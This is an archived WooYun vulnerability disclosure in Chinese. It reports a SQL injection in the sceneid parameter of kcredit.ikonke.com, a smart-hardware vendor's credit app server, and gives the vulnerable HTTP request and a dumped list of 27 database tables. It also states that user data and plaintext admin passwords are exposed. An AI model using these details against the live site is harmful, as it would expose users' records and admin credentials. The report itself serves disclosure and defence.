乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-03: 细节已通知厂商并且等待厂商处理中 2016-02-22: 厂商已经主动忽略漏洞,细节向公众公开
rt
以为是app访问的服务器就不会受到攻击?问题页面
GET /KCredit/index.php/Home/Scene/showSceneDetail?sceneid=1333&[email protected] HTTP/1.1Host: kcredit.ikonke.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://kcredit.ikonke.com/KCredit/index.php/Home/Scene/[email protected]Cookie: PHPSESSID=meacp7b9un0bt9sr9dai11ug55Connection: keep-alive
其中sceneid参数存在注入,跑了一下,发现涉及的表还有不少
Database: kcredit[27 tables]+-------------------------+| tb_activity || tb_activityregistration || tb_ad || tb_admin || tb_aliorderlog || tb_blacklist || tb_coupon || tb_guessing || tb_guessingbid || tb_guessingoption || tb_indexad || tb_kmoneyhistory || tb_message || tb_order || tb_product || tb_promotion || tb_promotioncode || tb_promotioncodeused || tb_scene || tb_scenecomment || tb_scenedownloadrecord || tb_tempcreditrecord || tb_templog || tb_user || tb_usercoupon || tb_usereventlog || tb_zanhistory |+-------------------------+
其中存在大量用户的信息
管理员的账号密码,竟然是明文
注意做好过滤什么的....智能硬件的安全性非常重要,这些智能硬件的安全完全能影响到个人的人身安全了....
危害等级:无影响厂商忽略
忽略时间:2016-02-22 02:30
漏洞Rank:15 (WooYun评价)
暂无